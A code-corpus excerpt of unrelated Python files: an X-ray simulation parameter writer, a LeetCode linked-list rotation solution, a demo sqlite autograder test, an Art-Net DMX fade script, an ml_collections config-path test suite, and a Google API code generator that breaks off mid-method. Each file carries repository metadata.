if key == KEY_SPECTRA_INTERPOLATION_MODEL:
value = formatMethods[key] % (self._parameters[key].getModel())
else:
value = formatMethods[key] % (self._parameters[key])
if value is not None and value != "None":
line = "%s=%s\n" % (key, value)
outputFile.write(line)
def _writeHeader(self, outputFile):
if self._parameters[KEY_VOXEL_SIMPLIFICATION] is not None:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in PhiRo computations",
"*** FilmNbrX = Number of X layers in PhiRo computations",
"*** FilmNbrY = Number of Y layers in PhiRo computations",
"*** FilmNbrZ = Number of Z layers in PhiRo computations",
"*** SpectraChannel = Number of channels in spectraa",
"*** SpectraInterpolation = Interpolation type for spectras",
"*** VoxelSimplification = Use only middle voxel of trajectories to store energy",
"***",
"********************************************************************************"]
elif self.version == Version.BEFORE_VERSION:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in PhiRo computations",
"*** FilmNbrX = Number of X layers in PhiRo computations",
"*** FilmNbrY = Number of Y layers in PhiRo computations",
"*** FilmNbrZ = Number of Z layers in PhiRo computations",
"*** SpectraChannel = Number of channels in spectraa",
"*** SpectraInterpolation = Interpolation type for spectras",
"***",
"********************************************************************************"]
elif self.version >= Version.VERSION_1_4_4:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in Spectrum computations",
"*** FilmNbrX = Number of X layers in Spectrum computations",
"*** FilmNbrY = Number of Y layers in Spectrum computations",
"*** FilmNbrZ = Number of Z layers in Spectrum computations",
"*** EnergyChannelWidth in eV",
"*** SpectraInterpolation = Interpolation type for spectra",
"*** ElasticCrossSectionScalingFactor",
"*** EnergyLossScalingFactor",
"***",
"********************************************************************************"]
else:
headerLines = [ "********************************************************************************",
"*** SIMULATION PARAMETERS",
"***",
"*** BaseFileName = All output files will be named using this term",
"*** ElectronNbr = Total number of electrons to simulate",
"*** PhotonNbr = Total number of photons to simulate in EDS",
"*** WindowNbr = Number of energy windows in Spectrum computations",
"*** FilmNbrX = Number of X layers in Spectrum computations",
"*** FilmNbrY = Number of Y layers in Spectrum computations",
"*** FilmNbrZ = Number of Z layers in Spectrum computations",
"*** EnergyChannelWidth in eV",
"*** SpectraInterpolation = Interpolation type for spectra",
"***",
"********************************************************************************"]
for line in headerLines:
outputFile.write(line+'\n')
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def baseFilename(self):
return self._parameters[KEY_BASE_FILENAME]
@baseFilename.setter
def baseFilename(self, baseFilename):
self._parameters[KEY_BASE_FILENAME] = baseFilename
@property
def numberElectrons(self):
return self._parameters[KEY_NUMBER_ELECTRONS]
@numberElectrons.setter
def numberElectrons(self, numberElectrons):
self._parameters[KEY_NUMBER_ELECTRONS] = numberElectrons
@property
def numberPhotons(self):
return self._parameters[KEY_NUMBER_PHOTONS]
@numberPhotons.setter
def numberPhotons(self, numberPhotons):
self._parameters[KEY_NUMBER_PHOTONS] = numberPhotons
@property
def numberWindows(self):
return self._parameters[KEY_NUMBER_WINDOWS]
@numberWindows.setter
def numberWindows(self, numberWindows):
self._parameters[KEY_NUMBER_WINDOWS] = numberWindows
@property
def numberFilmsX(self):
return self._parameters[KEY_NUMBER_FILMS_X]
@numberFilmsX.setter
def numberFilmsX(self, numberFilmsX):
self._parameters[KEY_NUMBER_FILMS_X] = numberFilmsX
@property
def numberFilmsY(self):
return self._parameters[KEY_NUMBER_FILMS_Y]
@numberFilmsY.setter
def numberFilmsY(self, numberFilmsY):
self._parameters[KEY_NUMBER_FILMS_Y] = numberFilmsY
@property
def numberFilmsZ(self):
return self._parameters[KEY_NUMBER_FILMS_Z]
@numberFilmsZ.setter
def numberFilmsZ(self, numberFilmsZ):
self._parameters[KEY_NUMBER_FILMS_Z] = numberFilmsZ
@property
def numberChannels(self):
return self._parameters[KEY_NUMBER_CHANNELS]
@numberChannels.setter
def numberChannels(self, numberChannels):
self._parameters[KEY_NUMBER_CHANNELS] = numberChannels
@property
def energyChannelWidth_eV(self):
return self._parameters[KEY_ENERGY_CHANNEL_WIDTH]
@energyChannelWidth_eV.setter
def energyChannelWidth_eV(self, energyChannelWidth_eV):
self._parameters[KEY_ENERGY_CHANNEL_WIDTH] = energyChannelWidth_eV
@property
def spectrumInterpolationModel(self):
return self._parameters[KEY_SPECTRA_INTERPOLATION_MODEL].getModel()
@spectrumInterpolationModel.setter
def spectrumInterpolationModel(self, spectrumInterpolationModel):
self._parameters[KEY_SPECTRA_INTERPOLATION_MODEL] = MCXRayModel.SpectrumInterpolationModel(spectrumInterpolationModel)
@property
def voxelSimplification(self):
return self._parameters.get(KEY_VOXEL_SIMPLIFICATION, None)
@voxelSimplification.setter
def voxelSimplification(self, voxelSimplification):
self._parameters[KEY_VOXEL_SIMPLIFICATION] = voxelSimplification
@property
def elasticCrossSectionScalingFactor(self):
return self._parameters[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR]
@elasticCrossSectionScalingFactor.setter
def elasticCrossSectionScalingFactor(self, elasticCrossSectionScalingFactor):
self._parameters[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR] = elasticCrossSectionScalingFactor
@property
def energyLossScalingFactor(self):
return self._parameters[KEY_ENERGY_LOSS_SCALING_FACTOR]
@energyLossScalingFactor.setter
def energyLossScalingFactor(self, energyLossScalingFactor):
self._parameters[KEY_ENERGY_LOSS_SCALING_FACTOR] = energyLossScalingFactor
| drix00/pymcxray | pymcxray/FileFormat/SimulationParameters.py | Python | apache-2.0 | 15,335 |
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
if not head: return None
p = head
listLen = 0 # calculate list length
while p:
p = p.next
listLen += 1
k = k % listLen # now k < listLen
if k == 0:
return head
p1 = head; p2 = head
for _ in xrange(k):
p2 = p2.next
assert p2
while p2.next:
p1 = p1.next
p2 = p2.next
newHead = p1.next
p1.next = None
p2.next = head
return newHead
from utils import *
printlist(Solution().rotateRight(makelist(1,2 ,3 ,4 ,5), 2)) | xiaonanln/myleetcode-python | src/61. Rotate List.py | Python | apache-2.0 | 732 |
test = {
'name': 'Question 2',
'points': 2,
'suites': [
{
'type': 'sqlite',
'setup': r"""
sqlite> .open hw1.db
""",
'cases': [
{
'code': r"""
sqlite> select * from colors;
red|primary
blue|primary
green|secondary
yellow|primary
""",
},
{
'code': r"""
sqlite> select color from colors;
red
blue
green
yellow
""",
},
],
}
]
}
| jackzhao-mj/ok-client | demo/sqlite/tests/q2.py | Python | apache-2.0 | 548 |
import time, logging
from artnet import dmx, fixtures, rig
from artnet.dmx import fades
log = logging.getLogger(__name__)
# set up test fixtures
r = rig.get_default_rig()
g = r.groups['all']
def all_red():
"""
Create an all-red frame.
"""
g.setColor('#ff0000')
g.setIntensity(255)
return g.getFrame()
def all_blue():
"""
Create an all-blue frame.
"""
g.setColor('#0000ff')
g.setIntensity(255)
return g.getFrame()
def main(config, controller=None):
log.info("Running script %s" % __name__)
# global g
# g = get_default_fixture_group(config)
q = controller or dmx.Controller(config.get('base', 'address'), bpm=60, nodaemon=True, runout=True)
q.add(fades.create_multifade([
all_red(),
all_blue(),
] * 3, secs=5.0))
if not controller:
q.start()
| ScienceWorldCA/domelights | backend/artnet-bridge/artnet/scripts/alternating_color_fades.py | Python | apache-2.0 | 776 |
# Copyright 2022 The ML Collections Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for config_path."""
from absl.testing import absltest
from absl.testing import parameterized
from ml_collections.config_flags import config_path
from ml_collections.config_flags.tests import fieldreference_config
from ml_collections.config_flags.tests import mock_config
class ConfigPathTest(parameterized.TestCase):
def test_list_extra_index(self):
"""Tries to index a non-indexable list element."""
test_config = mock_config.get_config()
with self.assertRaises(IndexError):
config_path.get_value('dict.list[0][0]', test_config)
def test_list_out_of_range_get(self):
"""Tries to access out-of-range value in list."""
test_config = mock_config.get_config()
with self.assertRaises(IndexError):
config_path.get_value('dict.list[2][1]', test_config)
def test_list_out_of_range_set(self):
"""Tries to override out-of-range value in list."""
test_config = mock_config.get_config()
with self.assertRaises(IndexError):
config_path.set_value('dict.list[2][1]', test_config, -1)
def test_reading_non_existing_key(self):
"""Tests reading non existing key from config."""
test_config = mock_config.get_config()
with self.assertRaises(KeyError):
config_path.set_value('dict.not_existing_key', test_config, 1)
def test_reading_setting_existing_key_in_dict(self):
"""Tests setting non existing key from dict inside config."""
test_config = mock_config.get_config()
with self.assertRaises(KeyError):
config_path.set_value('dict.not_existing_key.key', test_config, 1)
def test_empty_key(self):
"""Tests calling an empty key update."""
test_config = mock_config.get_config()
with self.assertRaises(ValueError):
config_path.set_value('', test_config, None)
def test_field_reference_types(self):
"""Tests whether types of FieldReference fields are valid."""
test_config = fieldreference_config.get_config()
paths = ['ref_nodefault', 'ref']
paths_types = [int, int]
config_types = [config_path.get_type(path, test_config) for path in paths]
self.assertEqual(paths_types, config_types)
@parameterized.parameters(
('float', float),
('integer', int),
('string', str),
('bool', bool),
('dict', dict),
('dict.float', float),
('dict.list', list),
('list', list),
('list[0]', int),
('object.float', float),
('object.integer', int),
('object.string', str),
('object.bool', bool),
('object.dict', dict),
('object.dict.float', float),
('object.dict.list', list),
('object.list', list),
('object.list[0]', int),
('object.tuple', tuple),
('object_reference.float', float),
('object_reference.integer', int),
('object_reference.string', str),
('object_reference.bool', bool),
('object_reference.dict', dict),
('object_reference.dict.float', float),
('object_copy.float', float),
('object_copy.integer', int),
('object_copy.string', str),
('object_copy.bool', bool),
('object_copy.dict', dict),
('object_copy.dict.float', float),
)
def test_types(self, path, path_type):
"""Tests whether various types of objects are valid."""
test_config = mock_config.get_config()
self.assertEqual(path_type, config_path.get_type(path, test_config))
if __name__ == '__main__':
absltest.main()
| google/ml_collections | ml_collections/config_flags/tests/config_path_test.py | Python | apache-2.0 | 4,017 |
#!/usr/bin/python2.7
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Create an API definition by interpreting a discovery document.
This module interprets a discovery document to create a tree of classes which
represent the API structure in a way that is useful for generating a library.
For each discovery element (e.g. schemas, resources, methods, ...) there is
a class to represent it which is directly usable in the templates. The
instances of those classes are annotated with extra variables for use
in the template which are language specific.
The current way to make use of this class is to create a programming language
specific subclass of Api, which adds annotations and template variables
appropriate for that language.
TODO(user): Refactor this so that the API can be loaded first, then annotated.
"""
__author__ = '[email protected] (Tony Aiuto)'
import json
import logging
import operator
import urlparse
from googleapis.codegen import data_types
from googleapis.codegen import template_objects
from googleapis.codegen import utilities
from googleapis.codegen.api_exception import ApiException
from googleapis.codegen.schema import Schema
from googleapis.codegen.utilities import convert_size
_DEFAULT_SERVICE_HOST = 'www.googleapis.com'
_DEFAULT_OWNER_DOMAIN = 'google.com'
_DEFAULT_OWNER_NAME = 'Google'
_RECOGNIZED_GOOGLE_DOMAINS = (
'google.com',
'googleapis.com',
'googleplex.com'
)
# Recognized names of request and response fields used for paging.
_PAGE_TOKEN_NAMES = ('pageToken', 'nextPageToken')
_LOGGER = logging.getLogger('codegen')
class Api(template_objects.CodeObject):
"""An API definition.
This class holds a discovery centric definition of an API. It contains
members such as "resources" and "schemas" which relate directly to discovery
concepts. It defines several properties that can be used in code generation
templates:
name: The API name.
version: The API version.
versionNoDots: The API version with all '.' characters replaced with '_'.
This is typically used in class names.
versionNoDash: The API version with all '-' characters replaced with '_'.
This is typically used in file names where '-' has meaning.
authScopes: The list of the OAuth scopes used by this API.
dataWrapper: True if the API definition contains the 'dataWrapper' feature.
methods: The list of top level API methods.
models: The list of API data models, both from the schema section of
discovery and from anonymous objects defined in method definitions.
parameters: The list of global method parameters (applicable to all methods)
resources: The list of API resources
"""
def __init__(self, discovery_doc, language=None):
super(Api, self).__init__(discovery_doc, self,
wire_name=discovery_doc['name'])
name = self.values['name']
self._validator.ValidateApiName(name)
if name != 'freebase':
self._validator.ValidateApiVersion(self.values['version'])
canonical_name = self.values.get('canonicalName') or name
if not self.values.get('canonicalName'):
self.values['canonicalName'] = canonical_name
self._class_name = self.ToClassName(canonical_name, self)
# Guard against language implementor not taking care of spaces
self._class_name = self._class_name.replace(' ', '')
self._NormalizeOwnerInformation()
self._language = language
self._template_dir = None
self._surface_features = {}
self._schemas = {}
self._methods_by_name = {}
self._all_methods = []
self.SetTemplateValue('className', self._class_name)
self.SetTemplateValue('versionNoDots',
self.values['version'].replace('.', '_'))
self.SetTemplateValue('versionNoDash',
self.values['version'].replace('-', '_'))
self.SetTemplateValue('dataWrapper',
'dataWrapper' in discovery_doc.get('features', []))
self.values.setdefault('title', name)
self.values.setdefault('exponentialBackoffDefault', False)
if not self.values.get('revision'):
self.values['revision'] = 'snapshot'
self._NormalizeUrlComponents()
# Information for variant subtypes, a dictionary of the format:
#
# { 'wireName': {'discriminant': discriminant, 'value': value,
# 'schema': schema},
# ... }
#
# ... where wireName is the name of variant subtypes, discriminant
# the field name of the discriminant, value the discriminant value
# for this variant, and schema the base schema.
#
# This information cannot be stored in the referred schema at
# reading time because at the time we read it from the base
# schema, the referenced variant schemas may not yet be loaded. So
# we first store it here, and after all schemas have been loaded,
# update the schema template properties.
self._variant_info = {}
# Build data types and methods
self._SetupModules()
self.void_type = data_types.Void(self)
self._BuildSchemaDefinitions()
self._BuildResourceDefinitions()
self.SetTemplateValue('resources', self._resources)
# Make data models part of the api dictionary
self.SetTemplateValue('models', self.ModelClasses())
# Replace methods dict with Methods
self._top_level_methods = []
method_dict = self.values.get('methods') or {}
for name in sorted(method_dict):
self._top_level_methods.append(Method(self, name, method_dict[name]))
self.SetTemplateValue('methods', self._top_level_methods)
# Global parameters
self._parameters = []
param_dict = self.values.get('parameters') or {}
for name in sorted(param_dict):
parameter = Parameter(self, name, param_dict[name], self)
self._parameters.append(parameter)
if name == 'alt':
self.SetTemplateValue('alt', parameter)
self.SetTemplateValue('parameters', self._parameters)
# Auth scopes
self._authscopes = []
if (self.values.get('auth') and
self.values['auth'].get('oauth2') and
self.values['auth']['oauth2'].get('scopes')):
for value, auth_dict in sorted(
self.values['auth']['oauth2']['scopes'].iteritems()):
self._authscopes.append(AuthScope(self, value, auth_dict))
self.SetTemplateValue('authscopes', self._authscopes)
@property
def all_schemas(self):
"""The dictionary of all the schema objects found in the API."""
return self._schemas
def _SetupModules(self):
"""Compute and set the module(s) which this API belongs under."""
# The containing module is based on the owner information.
path = self.values.get('modulePath') or self.values.get('packagePath')
self._containing_module = template_objects.Module(
package_path=path,
owner_name=self.values.get('owner'),
owner_domain=self.values.get('ownerDomain'))
self.SetTemplateValue('containingModule', self._containing_module)
# The API is a child of the containing_module
base = self.values['name']
# TODO(user): Introduce a breaking change where we always prefer
# canonicalName.
if self.values.get('packagePath'):
# Lowercase the canonical name only for non-cloud-endpoints Google APIs.
# This is to avoid breaking changes to existing Google-owned Cloud
# Endpoints APIs.
if self.values.get('rootUrl').find('.googleapis.com') > 0:
base = self.values.get('canonicalName').lower() or base
else:
base = self.values.get('canonicalName') or base
if self.values.get('version_module'):
base = '%s/%s' % (base, self.values['versionNoDots'])
self._module = template_objects.Module(package_path=base,
parent=self._containing_module)
self.SetTemplateValue('module', self._module)
# The default module for data models defined by this API.
self._model_module = template_objects.Module(package_path=None,
parent=self._module)
def _BuildResourceDefinitions(self):
"""Loop over the resources in the discovery doc and build definitions."""
self._resources = []
def_dict = self.values.get('resources') or {}
for name in sorted(def_dict):
resource = Resource(self, name, def_dict[name], parent=self)
self._resources.append(resource)
def _BuildSchemaDefinitions(self):
"""Loop over the schemas in the discovery doc and build definitions."""
schemas = self.values.get('schemas')
if schemas:
for name in sorted(schemas):
def_dict = schemas[name]
# Upgrade the string format schema to a dict.
if isinstance(def_dict, unicode):
def_dict = json.loads(def_dict)
self._schemas[name] = self.DataTypeFromJson(def_dict, name)
# Late bind info for variant types, and mark the discriminant
# field and value.
for name, info in self._variant_info.iteritems():
if name not in self._schemas:
# The error will be reported elsewhere
continue
schema = self._schemas[name]
for prop in schema.values.get('properties'):
if prop.values['wireName'] == info['discriminant']:
# Filter out the discriminant property as it is already
# contained in the base type.
schema.SetTemplateValue(
'properties',
[p for p in schema.values.get('properties') if p != prop])
break
else:
logging.warn("Variant schema '%s' for base schema '%s' "
"has not the expected discriminant property '%s'.",
name, info['schema'].values['wireName'],
info['discriminant'])
schema.SetTemplateValue('superClass', info['schema'].class_name)
# TODO(user): baseType is for backwards compatability only. It should
# have always been a different name. When the old Java generators roll
# off, remove it.
schema.SetTemplateValue('baseType', info['schema'].class_name)
schema.SetTemplateValue('discriminantValue', info['value'])
def _NormalizeOwnerInformation(self):
"""Ensure that owner and ownerDomain are set to sane values."""
owner_domain = self.get('ownerDomain', '')
if not owner_domain:
root_url = self.get('rootUrl')
if root_url:
owner_domain = urlparse.urlparse(root_url).hostname
# Normalize google domains.
if any(owner_domain.endswith(d) for d in _RECOGNIZED_GOOGLE_DOMAINS):
owner_domain = 'google.com'
if owner_domain:
owner_domain = utilities.SanitizeDomain(owner_domain)
else:
owner_domain = _DEFAULT_OWNER_DOMAIN
self.SetTemplateValue('ownerDomain', owner_domain)
if not self.get('ownerName'):
if owner_domain == _DEFAULT_OWNER_DOMAIN:
owner_name = _DEFAULT_OWNER_NAME
else:
owner_name = owner_domain.replace('.', '_')
self.SetTemplateValue('ownerName', owner_name)
if not self.get('owner'):
self.SetTemplateValue('owner', self['ownerName'].lower())
def _NormalizeUrlComponents(self):
"""Sets template values concerning the path to the service.
Sets rootUrl and servicePath from the values given or defaults based on what
is available. Verifies them for safeness. The hierarchy of the possible
inputs is:
use rootUrl + servicePath as the best choice if it exists (v1new)
or rpcPath
or use baseUrl (v1)
or use basePath (v1)
or restBasePath (v0.3)
or default to 'api/version'
Raises:
ValueError: if the values available are inconsistent or disallowed.
"""
# If both rootUrl and servicePath exist, they equal what is in baseUrl.
root_url = self.values.get('rootUrl')
service_path = self.values.get('servicePath')
rpc_path = self.values.get('rpcPath')
if root_url:
# oauth2 has a servicePath of "". This is wierd but OK for that API, but
# it means we must explicitly check against None.
if service_path is not None:
base_url = root_url + service_path
elif rpc_path:
base_url = rpc_path
else:
raise ValueError('Neither servicePath nor rpcPath is defined.')
else:
base_url = self.values.get('baseUrl')
# If we have a full path ('https://superman.appspot.com/kryptonite/hurts'),
# then go with that, otherwise just use the various things which might
# hint at the servicePath.
best_path = (base_url
or self.values.get('basePath')
or self.values.get('restBasePath')
or '/%s/%s/' % (self.values['name'], self.values['version']))
if best_path.find('..') >= 0:
raise ValueError('api path must not contain ".." (%s)' % best_path)
# And let urlparse to the grunt work of normalizing and parsing.
url_parts = urlparse.urlparse(best_path)
scheme = url_parts.scheme or 'https'
service_host = url_parts.netloc or _DEFAULT_SERVICE_HOST
base_path = url_parts.path
if not root_url:
self._api.SetTemplateValue('rootUrl', '%s://%s/' % (scheme, service_host))
if service_path is None:
self._api.SetTemplateValue('servicePath', base_path[1:])
# Make sure template writers do not revert
self._api.DeleteTemplateValue('baseUrl')
self._api.DeleteTemplateValue('basePath')
self._api.DeleteTemplateValue('serviceHost')
def ModelClasses(self):
"""Return all the model classes."""
ret = set(
s for s in self._schemas.itervalues()
if isinstance(s, Schema) or isinstance(s, data_types.MapDataType))
return sorted(ret, key=operator.attrgetter('class_name'))
def TopLevelModelClasses(self):
"""Return the models which are not children of another model."""
return [m for m in self.ModelClasses() if not m.parent]
def DataTypeFromJson(self, type_dict, default_name, parent=None,
wire_name=None):
"""Returns a schema object represented by a JSON Schema dictionary.
Evaluate a JSON schema dictionary and return an appropriate schema object.
If a data type is defined in-line, then create the schema dynamically. If
the schema is a $ref to another, return the previously created schema or
a lazy reference.
If the type_dict is None, a blank schema will be created.
Args:
type_dict: A dict of the form expected of a request or response member
of a method description. See the Discovery specification for more.
default_name: The unique name to give the schema if we have to create it.
parent: The schema where I was referenced. If we cannot determine that
this is a top level schema, set the parent to this.
wire_name: The name which will identify objects of this type in data on
the wire.
Returns:
A Schema object.
"""
# new or not initialized, create a fresh one
schema = Schema.Create(self, default_name, type_dict or {}, wire_name,
parent)
# Only put it in our by-name list if it is a real object
if isinstance(schema, Schema) or isinstance(schema, data_types.MapDataType):
# Use the path to the schema as a key. This means that an anonymous class
# for the 'person' property under the schema 'Activity' will have the
# unique name 'Activity.person', rather than 'ActivityPerson'.
path = '.'.join(
[a.values.get('wireName', '<anon>') for a in schema.full_path])
_LOGGER.debug('DataTypeFromJson: add %s to cache', path)
self._schemas[path] = schema
return schema
def AddMethod(self, method):
"""Add a new method to the set of all methods."""
self._all_methods.append(method)
self._methods_by_name[method.values['rpcMethod']] = method
def MethodByName(self, method_name):
"""Find a method by name.
Args:
method_name: (str) the full RPC name of a method defined by this API.
Returns:
Method object or None if not found.
"""
return self._methods_by_name.get(method_name)
def SchemaByName(self, schema_name):
"""Find a schema by name.
Args:
schema_name: (str) name of a schema defined by this API.
Returns:
Schema object or None if not found.
"""
return self._schemas.get(schema_name, None)
def SetVariantInfo(self, ref, discriminant, value, schema):
"""Sets variant info for the given reference."""
if ref in self._variant_info:
logging.warning("Base type of '%s' changed from '%s' to '%s'. "
"This is an indication that a variant schema is used "
"from multiple base schemas and may result in an "
"inconsistent model.",
ref, self._base_type[ref].wireName, schema.wireName)
self._variant_info[ref] = {'discriminant': discriminant, 'value': value,
'schema': schema}
def VisitAll(self, func):
"""Visit all nodes of an API tree and apply a function to each.
Walks a tree and calls a function on each element of it. This should be
called after the API is fully loaded.
Args:
func: (function) Method to call on each object.
"""
_LOGGER.debug('Applying function to all nodes')
func(self._containing_module)
func(self._module)
func(self._model_module)
for resource in self.values['resources']:
self._VisitResource(resource, func)
# Top level methods
for method in self.values['methods']:
self._VisitMethod(method, func)
for parameter in self.values['parameters']:
func(parameter)
func(parameter.data_type)
for schema in self._schemas.values():
self._VisitSchema(schema, func)
for scope in self.GetTemplateValue('authscopes') or []:
func(scope)
def _VisitMethod(self, method, func):
"""Visit a method, calling a function on every child.
Args:
method: (Method) The Method to visit.
func: (function) Method to call on each object.
"""
func(method)
for parameter in method.parameters:
func(parameter)
def _VisitResource(self, resource, func):
"""Visit a resource tree, calling a function on every child.
Calls down recursively to sub resources.
Args:
resource: (Resource) The Resource to visit.
func: (function) Method to call on each object.
"""
func(resource)
for method in resource.values['methods']:
self._VisitMethod(method, func)
for r in resource.values['resources']:
self._VisitResource(r, func)
def _VisitSchema(self, schema, func):
"""Visit a schema tree, calling a function on every child.
Args:
schema: (Schema) The Schema to visit.
func: (function) Method to call on each object.
"""
func(schema)
func(schema.module)
for prop in schema.values.get('properties', []):
func(prop)
for child in self.children:
func(child)
# Do not warn about unused arguments, pylint: disable=unused-argument
def ToClassName(self, s, element, element_type=None):
"""Convert a name to a suitable class name in the target language.
This default implementation camel cases the string, which is appropriate
for some languages. Subclasses are encouraged to override this.
Args:
s: (str) A rosy name of data element.
element: (object) The object we are making a class name for.
element_type: (str) Deprecated. The kind of object we are making a class
name for. E.g. resource, method, schema.
TODO(user): replace type in favor of class of element, but that will
require changing the place where we call ToClassName with no element.
Returns:
A name suitable for use as a class in the generator's target language.
"""
return utilities.CamelCase(s).replace(' ', '')
def NestedClassNameForProperty(self, name, schema):
"""Returns the class name of an object nested in a property."""
# TODO(user): This functionality belongs in the language model, but
# because of the way the api is bootstrapped, that isn't available when we
# need it. When language model is available from the start, this should be
# moved.
return '%s%s' % (schema.class_name, utilities.CamelCase(name))
@property
def class_name(self):
return self.values['className']
@property
def model_module(self):
return self._model_module
@property
def containing_module(self):
return self._containing_module
@property
def all_methods(self):
"""All the methods in the entire API."""
return self._all_methods
@property
def top_level_methods(self):
"""All the methods at the API top level (not in a resource)."""
return self._top_level_methods
class Resource(template_objects.CodeObject):
def __init__(self, api, name, def_dict, parent=None):
"""Creates a Resource.
Args:
api: (Api) The Api which owns this Resource.
name: (string) The discovery name of the Resource.
def_dict: (dict) The discovery dictionary for this Resource.
parent: (CodeObject) The resource containing this method, if any. Top
level resources have the API as a parent.
"""
super(Resource, self).__init__(def_dict, api, parent=parent, wire_name=name)
self.ValidateName(name)
class_name = api.ToClassName(name, self, element_type='resource')
self.SetTemplateValue('className', class_name)
# Replace methods dict with Methods
self._methods = []
method_dict = self.values.get('methods') or {}
for name in sorted(method_dict):
self._methods.append(Method(api, name, method_dict[name], parent=self))
self.SetTemplateValue('methods', self._methods)
# Get sub resources
self._resources = []
r_def_dict = self.values.get('resources') or {}
for name in sorted(r_def_dict):
r = Resource(api, name, r_def_dict[name], parent=self)
self._resources.append(r)
self.SetTemplateValue('resources', self._resources)
@property
def methods(self):
return self._methods
@property
def methods_dict(self):
return {method['wireName']: method for method in self._methods}
class AuthScope(template_objects.CodeObject):
"""The definition of an auth scope.
An AuthScope defines these template values
value: The scope url
name: a sanitized version of the value, transformed so it generally can
be used as an indentifier in code. Deprecated, use constantName
description: the description of the scope.
It also provides a template property which can be used after a language
binding is set.
constantName: A transformation of the value so it is suitable as a constant
name in the specific language.
"""
GOOGLE_PREFIX = 'https://www.googleapis.com/auth/'
HTTPS_PREFIX = 'https://'
def __init__(self, api, value, def_dict):
"""Construct an auth scope.
Args:
api: (Api) The Api which owns this Property
value: (string) The unique identifier of this scope, often a URL
def_dict: (dict) The discovery dictionary for this auth scope.
"""
super(AuthScope, self).__init__(def_dict, api, wire_name=value)
self._module = api.module
self.SetTemplateValue('value', value)
while value.endswith('/'):
value = value[:-1]
if 'description' not in self.values:
self.SetTemplateValue('description', value)
# Strip the common prefix to get a unique identifying name
if value.startswith(AuthScope.GOOGLE_PREFIX):
scope_id = value[len(AuthScope.GOOGLE_PREFIX):]
elif value.startswith(AuthScope.HTTPS_PREFIX):
# some comon scopes are are just a URL
scope_id = value[len(AuthScope.HTTPS_PREFIX):]
else:
scope_id = value
# We preserve the value stripped of the most common prefixes so we can
# use it for building constantName in templates.
self.SetTemplateValue('lastPart', scope_id)
# replace all non alphanumeric with '_' to form 'name'
name = ''.join([(c if c.isalnum() else '_') for c in scope_id.upper()])
self.SetTemplateValue('name', name)
@property
def constantName(self): # pylint: disable=g-bad-name
"""Overrides default behavior of constantName."""
return self._language_model.ApplyPolicy('constant', self,
self.values['lastPart'])
class Method(template_objects.CodeObject):
"""The definition of a method."""
def __init__(self, api, name, def_dict, parent=None):
"""Construct a method.
Methods in REST discovery are inside of a resource. Note that the method
name and id are calculable from each other. id will always be equal to
api_name.resource_name[.sub_resource...].method_name. At least it should
be, as that is the transformation Discovery makes from the API definition,
which is essentially a flat list of methods, into a hierarchy of resources.
Args:
api: (Api) The Api which owns this Method.
name: (string) The discovery name of the Method.
def_dict: (dict) The discovery dictionary for this Method.
parent: (CodeObject) The resource containing this Method, if any.
Raises:
ApiException: If the httpMethod type is not one we know how to
handle.
"""
super(Method, self).__init__(def_dict, api, parent=(parent or api))
# TODO(user): Fix java templates to name vs. wireName correctly. Then
# change the __init__ to have wire_name=def_dict.get('id') or name
# then eliminate this line.
self.SetTemplateValue('wireName', name)
self.ValidateName(name)
class_name = api.ToClassName(name, self, element_type='method')
if parent and class_name == parent.values['className']:
# Some languages complain when the collection name is the same as the
# method name.
class_name = '%sRequest' % class_name
# The name is the key of the dict defining use. The id field is what you
# have to use to call the method via RPC. That is unique, name might not be.
self.SetTemplateValue('name', name)
# Fix up very old discovery, which does not have an id.
if 'id' not in self.values:
self.values['id'] = name
self.SetTemplateValue('className', class_name)
http_method = def_dict.get('httpMethod', 'POST').upper()
self.SetTemplateValue('httpMethod', http_method)
self.SetTemplateValue('rpcMethod',
def_dict.get('rpcMethod') or def_dict['id'])
rest_path = def_dict.get('path') or def_dict.get('restPath')
# TODO(user): if rest_path is not set, raise a good error and fail fast.
self.SetTemplateValue('restPath', rest_path)
# Figure out the input and output types and schemas for this method.
expected_request = self.values.get('request')
if expected_request:
# TODO(user): RequestBody is only used if the schema is anonymous.
# When we go to nested models, this could be a nested class off the
# Method, making it unique without the silly name. Same for ResponseBody.
request_schema = api.DataTypeFromJson(expected_request,
'%sRequestContent' % name,
parent=self)
self.SetTemplateValue('requestType', request_schema)
expected_response = def_dict.get('response') or def_dict.get('returns')
if expected_response:
response_schema = api.DataTypeFromJson(expected_response,
'%sResponse' % name,
parent=self)
if self.values['wireName'] == 'get':
response_schema.values['associatedResource'] = parent
self.SetTemplateValue('responseType', response_schema)
else:
self.SetTemplateValue('responseType', api.void_type)
# Make sure we can handle this method type and do any fixups.
